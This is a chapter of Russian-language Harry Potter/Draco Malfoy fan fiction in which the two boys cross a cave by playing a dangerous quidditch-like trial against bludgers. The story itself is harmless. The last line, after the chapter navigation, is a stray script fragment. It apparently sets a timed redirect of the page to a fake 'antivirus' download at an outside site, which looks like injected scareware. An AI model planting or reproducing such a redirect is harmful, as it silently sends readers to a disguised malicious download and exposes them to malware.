Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 2. Безумный Квиддич.

(Глава, в которой всех охватывает дух командной игры, Гарри становится вышибалой, а Драко лишается плаща)

- Что он тут наболтал! Я ничего не понял, - Драко с досадой пнул сухую землю. Из-под его туфли выбилось облачко пыли. Гарри не ответил. Присел на корточки, рассматривая предметы и складывая их в мешок. Мантия-невидимка, коричневая банка из толстого стекла, коробка с сэндвичами и пирогами. Последней он поднял флягу.

- Малфой, пить хочешь?

- А как ты думаешь, Поттер? – скривился тот, - нет, я пил тыквенный сок, пока ты не видел.

- На, - мрачно сказал Гарри.

- Ты очень любезен, - произнес Драко, выхватывая ее, и приникая к горлышку.

- Какое-то заклинание… Какой-то вопрос… Заклинание… Я не произносил никакого заклинания… - Утолив жажду, Драко повернулся к виновнику всех своих бед, - Если его не произносил я, то значит, его произнес ты! – страдалец зловеще сощурился, - Поттер! Это по твоей вине мы тут оказались?!

- Успокойся, - Гарри выставил вперед руку, словно пытаясь защититься от его гнева, - я не знал, что окажусь здесь. Мне просто нужен был ответ на вопрос, вот и все. Поверь, меньше всего мне хотелось проводить время с тобой.

- Не надо хамить мне, Поттер! Может, ты специально подвергаешь мою жизнь опасности?! Ты! Ты вечно втягиваешь меня в неприятности. Еще на первом курсе из-за тебя, – прошипел слизеринец, указывая на Гарри пальцем, - я попал в Запретный лес!

- Что? – воскликнул тот, не веря в такую наглость, - да ты первый виноват во всех своих неприятностях! «Из-за тебяяя я попал в Запретный лееес», - передразнил он, - а кто заставлял тебя шпионить за нами?

- Вы нарушали правила! – выпалил Драко, розовея.

- Ой, да неужели?! – Гарри с усмешкой поднял брови, - посмотрите на этого маменькиного сынка, этого пай-мальчика. Сколько раз ты саботировал квиддичные матчи? В каких правилах написано, что можно изображать дементоров и пугать ими ловца?

- Не уходи от темы, Поттер! – Драко нервно теребил застежку своего плаща, - ты же не умер! А мы умрем!

- Ну, извини! Я не хотел! – развел руками Гарри и угрюмо принялся запихивать флягу в мешок.

Драко стоял, озираясь. Наконец, он не выдержал.

- И что нам теперь делать?

Почувствовав себя виноватым, Гарри пожал плечами:

- Наверное, идти вперед, Малфой. Есть другие предложения?

Слизеринец фыркнул, что в данном случае могло означать лишь одно: других предложений у него нет.

- Тогда пошли, - сказал Гарри и направился туда, где начиналось желтое небо, и поднималась серая пыль. Драко побрел за ним. Глядя в спину товарищу по несчастью, он старался гнать от себя  любые мысли, так или иначе способные вернуть страх и панику. Поэтому сначала Драко размышлял о его мантии и осанке, а потом тихо запел:

- I lived my life in shadow, never the sun on my face…

Пение помогало отрешиться от волнений,  забыться и расслабится.

- It didn’t seem so sad, though, I figured that was my place[1], - его голос зазвучал немного громче.

- Малфой, - Гарри бросил на попутчика косой взгляд, - песня ужасная. Может быть, ты просто замолчишь?

- Отвали, Шрамоголовый, я здесь из-за тебя, - огрызнулся тот.

- Ладно, хорек, тогда, раз ты не можешь не петь, спой что-нибудь другое.

Драко почувствовал интерес к своей персоне и приосанился:

- Что, например?

- Ну,  например, - Гарри задумался на секунду, - например, «У Мэри был барашек»!

- Что за тупое название! С какой стати мне петь про баранов, - скривился слизеринец, - не знаю такой песни.

- О! Смотри! – вдруг воскликнул Гарри, резко останавливаясь. От неожиданности Драко споткнулся, и, удерживая равновесие, схватился за рукав его мантии. Выпрямившись, поднял голову и увидел.

Примерно в трехстах футах от места, где стояли мальчики, возвышался холм, похожий на лысую желтую голову. У его подножия, между каменных выступов темнело отверстие размером в человеческий рост. Холм появился, словно из ниоткуда, ведь еще пару секунд назад горизонт был чист. Такое неожиданное обновление в ландшафте удивило и насторожило Драко. Стараясь справиться с неприятным предчувствием, он громко провозгласил:

- О! Гора! А в ней пещера!

- Я вижу, - сухо ответил Гарри, - и думаю, что нам надо войти внутрь.

- Глупости! Зачем нам туда заходить? Мало ли какие твари могут нас там ждать, - возмутился Драко.

Гарри повернулся к нему. Посмотрел внимательно, спустив очки на кончик носа.

- Слушай, нам надо проходить испытания. Чем быстрее мы пройдем их, тем быстрее вернемся в нормальный мир.

Его спутник закатил глаза:

- И поэтому нам обязательно искать приключения в темной пещере! А почему мы не можем просто обойти этот холм и пройти испытание где-нибудь в более приятном месте? Например, на залитой солнцем лужайке?

Гриффиндорец поднял брови:

-   Лужайке? Где она, твоя лужайка? И что это будет за испытание? Собрать самый большой букет? Ради Мерлина! Холм появился тут неспроста. Ну, хорошо, я готов обойти его, но что-то мне подсказывает, что нам все равно придется к нему вернуться.

-   Ой, твоя интуиция, Поттер - последнее, чему я готов поверить, - холодно бросил Драко, жестоко проигнорировав собственный внутренний голос, полностью солидарный с гриффиндорцем. Гарри только пожал плечами.

В течение получаса мальчики пытались обойти роковую возвышенность, но холм словно вырастал перед ними, снова и снова предлагая войти в темную щель между камнями. Тем временем слизеринец с волнением отметил, что небо стало свинцовым, тяжело и мрачно нависая над ними. 

- Кажется, темнеет, - с тревогой в голосе сказал он, останавливаясь все в тех же трехстах футах от пещеры.

- Да, темнеет, - согласился Гарри, поворачиваясь к нему, - и может быть, мы все-таки спустимся в расщелину, или будем и дальше ходить вокруг?

Драко вздохнул. Ему одинаково не хотелось оставаться на поверхности и спускаться куда бы то ни было.

- Может быть, попробуем подняться наверх, на холм? – предложил он.

- Попробуй, а я постою внизу, - кивнул гриффиндорец спокойно.

- Я, что ли, должен туда забираться один? – запротестовал Драко.

- Ну, ты проверишь, возможно ли это в принципе.

- Мог бы составить компанию, Поттер, тем более что я…

- Здесь из-за тебя, - с улыбкой закончил тот.

Слизеринец бросил на него злой взгляд, и направился к холму. Гарри пошел следом. В полной тишине они достигли возвышенности. Драко собрался с духом и сделал шаг на пологий склон. Однако в тот же момент почувствовал, что впереди нечто сдерживает его и мешает подняться.

- Ну, как успехи, Малфой? – поинтересовался Гарри, стоявший в нескольких футах  от него.

- Нормально, Поттер. Кто бы мог подумать, что великий Герой побоится подняться на паршивую горку, - бесился Драко, из последних сил стараясь преодолеть незримое сопротивление.

- Ты меня еще плохо знаешь, - отозвался гриффиндорец, улыбаясь. Наконец, не сделав и пары шагов к вершине холма, Драко сдался и спустился к подножью.

- Ладно, Потти,  теперь ты первый спускайся в пещеру, а я – после тебя, - ехидно предложил он, подходя к Гарри. Тот пожал плечами:

- Ладно.

И не медля ни минуты, направился к расщелине. Вскоре он исчез во мраке, и только его голос окликнул застывшего в нерешительности слизеринца:

- Все в порядке. Можешь спускаться.

Драко помялся несколько секунд, окинул тоскливым прощальным взглядом землю до горизонта, взглянул на свои туфли, испачканные в пыли, и последовал за ним.

Их путь пролегал по каменному туннелю, ведущему, казалось, к самому центру земли. Они двигались в кромешной мгле, так что Драко не видел даже спину своего спутника, но точно знал, что тот идет впереди. Слизеринец слышал его шаги, его недовольный шепот, когда под ноги попадался камень или неглубокая лужа, и, несмотря на неизвестную, неминуемую опасность, ожидавшую впереди, чувствовал себя защищенным. Это напоминало прогулку по Запретному лесу. Тогда, вопреки логике, Драко тоже ощущал себя так. Пока не увидел тварь, пьющую кровь, разумеется.

- Поттер, - его голос казался оглушительно громким, хоть слизеринец почти шептал, - как ты думаешь, каким будет первое испытание?

Не дождавшись ответа, он продолжил:

- Наверное, это будет какое-нибудь сражение. Ты и я против толпы монстров. Я надеюсь – ты не испугаешься, в противном случае, мне придется справляться самому. Или нет, я даже уверен, что это будет игра в загадки. Ты знаешь загадки, Потти? Эй, Потти!

Драко занервничал, но тут знакомый голос ответил ему немного сухо:

- А?

- Я же разговариваю с тобой! Неужели так трудно поддержать беседу?

- Я кивнул головой, - отозвался невидимый Гарри.

- Мерлин, Поттер, ты – идиот? Я же тебя не вижу!

- А жаль, иначе ты бы знал, что я тебя внимательно слушаю.

- ХА-ХА-ХА! Как смешно, Поттер.

- Малфой, обрати внимание, кстати, что стало светлее, - тихо сказал тот. И действительно, Драко осознал, что хорошо видит мантию идущего впереди гриффиндорца.

- Правда, стало светлее. Вряд ли это хороший знак, - насторожился Драко.

- Да уж, вот тут ты прав. Но посмотри на это с другой стороны. Мы перестанем мучиться в неизвестности, - философски отметил Гарри.

- Какое-то сомнительное утешение, - фыркнул слизеринец. По мере того, как холодный свет наполнял туннель, Драко все больше паниковал. И вот свод узкого коридора поднялся, и мальчики вышли в огромный зал.

- Малфой, скажи – что ты видишь? – спросил Гарри, оглядывая открывшееся зрелище.

- Я вижу темные балки, примерно семь футов шириной, перекрещенные друг с другом. Это похоже на здоровую решетку, под которой – пустота. И что бы попасть на другой край пещеры… - растерянный Драко не закончил, озираясь по сторонам. Он даже не огрызнулся на просьбу Поттера описать увиденное, настолько мрачным был вывод: другой дороги не было, им предстояло пересечь огромное пространство по этим черным перекрытиям.

- Ну что ж, идем, - спокойно произнес Гарри, пожимая плечами, и сделал шаг на балку. В тот же миг она растаяла перед ним. Он едва успел отскочить.

- Что происходит? – прошептал слизеринец.

Гарри молчал. Он посмотрел вниз, потом направо и налево, задумчиво потирая лоб.

-   Поттер, ты слышал?! Я задал тебе вопрос! – воскликнул Драко зло. Ему казалось, что такая манера говорить скрывает страх.

- Ага! – вдруг воскликнул его спутник, - кажется, я знаю… Посмотри вверх, Малфой!

- Зачем это еще? – недовольно буркнул тот, но голову задрал. Над вновь возникшими из ниоткуда перекрытиями возвышались три квиддичных кольца.

- А там, справа, метлы и биты. - Гарри указал на две метлы и две биты, прислоненные к отвесной стене скалы, - я думаю – это что-то вроде Квиддича, - закончил он уверенно.

-  Но где же квофл, бладжеры и снитч? Где команды? Нас ведь всего двое… и мы оба ловцы. Зачем нам биты? Да и кольца только с одной стороны, - сухо возразил Драко, - ты спятил, Поттер?

- Сомневаюсь, - усмехнулся тот, - в любом случае, на противоположную сторону обрыва можно перебраться только на метле. Это какое-то испытание, и для того, чтобы его пройти, нам надо подняться в воздух.

- Ну, конечно! Поттер, эксперт по испытаниям! - Повышая голос, провозгласил слизеринец. Хамство бодрило.

- Хорошо. Ты как хочешь, а я пошел, - Гарри пожал плечами, и уже через несколько минут парил над головой.

- Ну, не надумал? – крикнул он, помахивая битой.

- Тупая идея, - взяв свою, процедил Драко, однако все же сел на метлу и взлетел в воздух. Подчиняясь старому инстинкту ловца, завис на расстоянии нескольких футов от гриффиндорца.

- И что теперь? – окликнул он Гарри, неуверенно поглядывая вниз, в пропасть, зиявшую между перекрытиями.

- Теперь попробуем перелететь на другую сторону, - ответил тот.

- А зачем биты?! – крикнул Драко, прищурившись.

- Понятия не имею, - отозвался гриффиндорец, и направил метлу на другой конец пещеры.

- Я так и думал, что ты не сможешь ответить ничего вразумительного, Поттер, - тихо сказал Драко, зная, что тот его не услышит. Предательский страх катился по спине каплями холодного пота, и, ощущая себя беспомощным перед чем-то, что могло встретить их впереди, белокурый юноша ожидал от Великого Поттера поддержки. Из глубоких раздумий слизеринца вырвал крик Гарри:

- Малфой! Берегись!

- Какого… - Драко непроизвольно отшатнулся назад, растерянно крутя головой, как вдруг что-то на огромной скорости пронеслось впереди, задев древко метлы, ломая и разворачивая ее. Его закрутило, и не удержавшись он полетел вниз. В момент падения ужас охватил Драко, но через секунду он осознал, что лежит на черной балке, а сверху на него несется предмет, напоминающий бладжер. Слизеринец собрал все силы для рывка, готовый откатиться в сторону, но в воздухе просвистела бита, и снаряд улетел далеко в темное пространство пещеры.

- Малфой, постарайся встать! - крикнул Гарри, зависая в нескольких футах над ним и переводя дыхание, - твоя бита… она рядом… возьми ее… Мы должны отбивать бладжеры…

- Куда? – прошептал Драко, понимая, что надо встать, найти биту, но не мог пошевелиться. Его охватил ступор.

- Поттер, дай я сяду к тебе на метлу…. – начал он тихо.

- Осторожно! – донеслось откуда-то сверху. Юноша поднял голову и увидел Гарри, летящего на  него в погоне за мячом. Тут произошло нечто, чего Драко впоследствии не смог бы объяснить. Ощутив в себе силы, о существовании которых еще мгновенье назад не подозревал, он вскочил на ноги, схватил обнаружившуюся рядом биту и, размахнувшись, попал по стремящемуся снести ему голову бладжеру. Удар отозвался резкой болью в руках. Переведя дыхание, слизеринец посмотрел вверх. Дальнейшее несколько удивило его. Гарри отбил этот нечаянный пас и послал мяч прямо в одно из возвышавшихся над перекрытиями колец. Прозвучал сигнал, напомнивший мальчикам звук гонга, и кольцо закрыла черная пластина. Однако слизеринец не успел обдумать увиденное, так  как в последнюю секунду подпрыгнул, пропуская под ногами второй бладжер.

- Малфой, - крикнул Гарри, проносясь над головой, - попытайся отбивать мячи мне. Кажется, их надо забить в три кольца. Одно мы уже закрыли!

Драко не стал возражать, заметив, что бладжер возвращается. 

- Поттер! – только и успел проорать он, когда, неловко перехватив биту, ударил по мячу. С трудом удержавшись на ногах, он увидел гриффиндорца. Тот отбил подачу, но попал в опору. Бладжер летел обратно.

- Малфой! Справа! – слова дошли до сознания Драко за долю секунды. Посмотрев в указанном направлении, он наткнулся взглядом на третий мяч, с бешеной скоростью приближавшийся к нему. Не в состоянии произнести ни слова, Драко побежал по перекрытию. Запутался в полах плаща, который тут же отбросил, вырвав застежку. В следующую минуту остановился на перекрестке балок, отбил один бладжер, и упал назад, ударившись спиной о металлическую поверхность. Не чувствуя боли, Драко перекатился на бок, когда слева, в дюйме от его головы, о балку ударил второй мяч. Снова вскакивая, слизеринец услышал гонг. «Еще одно кольцо закрылось», - решил юноша, сжимая биту вспотевшими ладонями.

- Малфой, ты там как? – донеслось сверху, и он увидел Поттера, зависшего в нескольких футах над ним.

- Отлично! – выкрикнул Драко, задирая голову. Горячее ликование охватило его в тот момент. Ведь у них получилось забить два мяча.

- Берегись! – вдруг заорал Гарри, снимаясь с места и направляя метлу вниз. Драко повернулся и тут же ощутил  сильнейший удар. Последний бладжер ударил в биту, выбивая ее из рук мальчика. Но слизеринец не понял этого. Резкая боль пронзила кисть, локоть и впилась в лопатку. «Ничего себе», - до странности спокойно подумал он, падая на колени.

- Малфой! Драко! – донеслось до него сквозь шум в ушах. «Ха! Он обратил на меня внимание, только потому, что без меня ему не выиграть», - проскользнула мысль на грани сознания. И в следующий миг все стихло. Драко показалось, будто прошло не меньше часа, однако, открыв глаза, он решил, что стоит на коленях, опираясь на ладони всего минуту. Рядом с метлы спрыгнул гриффиндорец. Мгновение оба мальчика смотрели друг на друга. Затем Гарри присел на корточки.

-   Мерлин! Ты цел, Малфой? Ответь!

-   Что, волнуешься? – процедил слизеринец, чувствуя себя жалким. Он сел на задницу, прижимая руки к груди, - не бойся, я в порядке. У  тебя еще есть шанс выбраться отсюда. Где бладжеры?

-   Похоже, их больше не будет. – Вздохнул Гарри, вытирая лоб рукавом мантии, - ты точно в порядке. Ничего не сломал, Малфой?

-   Откуда я знаю, Поттер! – холодно ответил тот, но, помолчав, добавил, - болит здесь, - и показал в район солнечного сплетения.

-   Это оттого, что ты упал на спину. Давай помогу тебе встать, нам надо уходить. С противоположной стороны пещеры открылся выход.

-   Вперед, Поттер! – с издевкой сказал Драко, злясь на себя за слабость, – как герой, ты обязан взять меня на руки.

-   Хватит паясничать, - откликнулся гриффиндорец, вставая и подавая ему руку. Тот ухватился за нее, поднимаясь. И только пройдя несколько метров, вдруг подумал: «Вот так Поттер первым протянул мне руку». Сердце тоскливо сжалось, и он мысленно разозлился на Гарри.

-   Эй, Потти, - сказал Драко, нагоняя гриффиндорца у выхода из пещеры, - если ты пойдешь чуть помедленнее, ты обратишь внимание, что я хромаю и не могу так нестись. К тому же я потерял свой плащ.

-   Извини, - бросил Гарри, остановившись, - болят ноги?

-   Как ты догадался?! – ухмыльнулся слизеринец, ковыляя дальше.

Мальчики миновали проход и оказались в коридоре, освещенном факелами.

- Дай воды, - попросил Драко резко. Его спутник вновь остановился, бросив быстрый взгляд на его бледное лицо. Потом достал флягу и протянул ему:

- На. Может, немного отдохнем?

- Твои драгоценные ножки не идут, Поттер? – ядовито протянул Драко.

- Разве не ты жаловался на хромоту и неспособность быстро передвигаться? – холодно поинтересовался Гарри.

- Много чести, жаловаться тебе, - фыркнул слизеринец, - давай, идем дальше.

На самом деле Драко устал. Ныли коленки и болела грудь. Но ему хотелось убраться как можно дальше от проклятых бладжеров, пропасти и колец.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>